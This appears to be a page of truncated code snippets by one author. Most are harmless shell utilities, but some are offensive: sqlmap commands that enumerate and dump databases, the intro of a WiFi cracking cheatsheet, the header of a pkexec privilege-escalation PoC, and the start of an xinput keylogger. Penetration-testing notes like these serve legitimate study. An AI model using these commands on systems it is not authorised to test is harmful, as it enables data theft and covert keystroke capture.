atcasanova

# Basic usage

./sqlmap.py -u "inject address" --dbs // enumerate database
./sqlmap.py -u "inject address" --current-db // current database
./sqlmap.py -u "inject address" --users // column database user
./sqlmap.py -u "inject address" --current-user // current user
./sqlmap.py -u "inject address" --tables -D "database" // enumerate the table name of the database
./sqlmap.py -u "inject address" --columns -T "table name" -D "database" // get the column name of the table
./sqlmap.py -u "inject address" --dump -C "field, field" -T "table name" -D "database" // get the data in the table, including the column, is the pants

atcasanova

Step-by-Step Guide for WEP, WPA, PMKID, ARP Request Replay, WPS PIN, HITRE, and Evil Twin Attacks

WiFi penetration testing is a critical component of network security, aiming to identify vulnerabilities in wireless networks and implement appropriate security measures.

Our WiFi penetration testing cheatsheet covers various techniques and methodologies targeting WEP, WPA, WPA2, and WPA3 encryption standards.

Essential Tools for WiFi Penetration Testing

Here are some popular automated tools for WiFi penetration testing that will be invaluable for your WiFi penetration testing cheatsheet:

• Aircrack-ng Suite: https://www.aircrack-ng.org/
• Wireshark: https://www.wireshark.org/

atcasanova

/*
 * blasty-vs-pkexec.c -- by blasty <peter@haxx.in> 
 * ------------------------------------------------
 * PoC for CVE-2021-4034, shout out to Qualys
 *
 * ctf quality exploit
 *
 * bla bla irresponsible disclosure
 *
 * -- blasty // 2022-01-25

atcasanova

for device in $(ls /sys/bus/usb/devices/*/product); do 
  echo "$device: "| cut -f6 -d/ | tr '\n' ' '; cat $device;
done

locate the identifier for your device and:

echo '1-5' | sudo tee /sys/bus/usb/drivers/usb/unbind
where 1-5 is the identifier

to enable it again:

atcasanova

#!/bin/bash
IFS=\; read nome email empresa telefone <<< "$1"
filename="$(sha256sum <<< "$email"| cut -f1 -d" ").txt"
echo "Nome: $nome
E-Mail: $email
Empresa: $empresa
Telefone: $telefone" > $filename

atcasanova

#!/bin/bash
while read line; do
    # atribuir dados às variáveis
    nome=$(echo "$line" | cut -f1 -d";")
    email=$(echo "$line" | cut -f2 -d";")
    empresa=$(echo "$line" | cut -f3 -d";")
    telefone=$(echo "$line" | cut -f4 -d";")
    filename="$(echo -n "$email" | sha256sum | cut -f1 -d" ").txt"
    
    # montar o arquivo

atcasanova

#!/bin/bash
while IFS=\; read nome email empresa telefone; do
    filename="$(sha256sum <<< "$email"| cut -f1 -d" ").txt"
    
    # montar o arquivo
    echo "Nome: $nome
E-Mail: $email
Empresa: $empresa
Telefone: $telefone" > $filename
done < data.csv

atcasanova

#!/bin/bash
# you'll have to get your keyboard id from xinput --list
# then start it like nohup ./keyboard.sh & and write down the pid
# shown. When you're done, just kill $pid and it will print the recorded
# keystrokes

handler(){
  killall -9 xinput 
  while read line; do
    sed "s|$line|${mapa[$line]}|" <<< $line

atcasanova

Enabling cedilla and dead keys on kali linux

change: 
"cedilla" "Cedilla" "gtk20" "/usr/share/locale" "az:ca:co:fr:gv:oc:pt:sq:tr:wa"
to
"cedilla" "Cedilla" "gtk20" "/usr/share/locale" "az:ca:co:fr:gv:oc:pt:sq:tr:wa:en"
on these files:

/usr/lib/x86_64-linux-gnu/gtk-3.0/3.0.0/immodules.cache
/usr/lib/x86_64-linux-gnu/gtk-2.0/2.10.0/immodules.cache 

atcasanova

#!/bin/bash
(( $# != 2 )) && {
    echo "uso: ./$0 10.0.0.0/8 10.10.10.10/24"
    exit 1
}
IFS="/" read ip1 mask1 <<< $1
IFS="/" read ip2 mask2 <<< $2
size=$mask1
readarray -d'.' -t first <<< $ip1
readarray -d'.' -t second <<< $ip2